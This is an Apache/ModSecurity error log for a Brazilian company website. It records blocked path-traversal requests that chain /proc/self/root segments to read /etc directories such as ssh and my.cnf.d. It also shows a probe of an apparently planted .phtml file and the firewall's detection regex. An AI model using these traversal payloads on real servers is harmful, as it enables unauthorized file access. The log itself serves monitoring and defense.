[Thu Mar 19 13:57:30.771347 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:51554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwq-ta6ubjKNq_cu4ZvEgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:57:36.397944 2026] [mime_magic:error] [pid 15826:tid 140411582465792] (70014)End of file found: [client 57.141.18.28:34520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 13:57:37.307513 2026] [:error] [pid 8557:tid 140411658000128] [client 74.7.243.128:50042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrAWm-FynrlR64ECVP-gAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:57:37.810791 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.244.43:50652] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwrAeyqAr6etmhZHNp3zAAAAE4"]
[Thu Mar 19 13:57:40.296720 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:36964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrBOyqAr6etmhZHNp3zgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:57:41.129767 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55540] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:57:44.371121 2026] [:error] [pid 8557:tid 140411641214720] [client 74.7.243.128:36980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrCGm-FynrlR64ECVP_QAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:57:47.412770 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:36982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrC9a6ubjKNq_cu4ZvIAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:04.125812 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56430] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:58:06.745098 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.241.31:55358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrHhCii7xarUs8iHYAbwAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:12.043377 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:45812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrJOoXxyEfFpUF8f8k6QAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:12.534187 2026] [core:alert] [pid 27293:tid 140411716749056] [client 57.141.18.91:35730] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 13:58:14.391550 2026] [:error] [pid 8557:tid 140411582465792] [client 74.7.241.31:45824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrJmm-FynrlR64ECVQDQAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:17.990173 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.241.31:45828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrKRCii7xarUs8iHYAewAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:22.906567 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:60062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrLgbLMZ6AikZjR9V1qwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:28.151684 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57442] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:58:42.135185 2026] [:error] [pid 7032:tid 140411674785536] [client 74.7.241.31:55328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrQnOoiBhmblfxy7FQtAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:44.277517 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:37106] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrROyqAr6etmhZHNp34QAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:53.885784 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58398] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:58:56.817387 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:37118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrUAkwaGbbGflqUZDhNQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:58:58.579157 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:57172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrUhkFeYa1D6dYQnAJ1QAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:01.170557 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:57192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrVeyqAr6etmhZHNp35gAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:02.271836 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.95:38156] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwrVvqxLDW4GITHUkSAfgAAARI"]
[Thu Mar 19 13:59:03.502973 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:53074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrV8df6f5d65gmYZSSHwAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:07.266952 2026] [:error] [pid 7032:tid 140411666392832] [client 74.7.243.128:49856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrWnOoiBhmblfxy7FQwwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:07.467669 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.241.31:57200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrW_qxLDW4GITHUkSAhQAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:13.727081 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:58274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwrYfqxLDW4GITHUkSAkAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:59:15.373824 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59192] AH01075: Error dispatching request to : (polling)
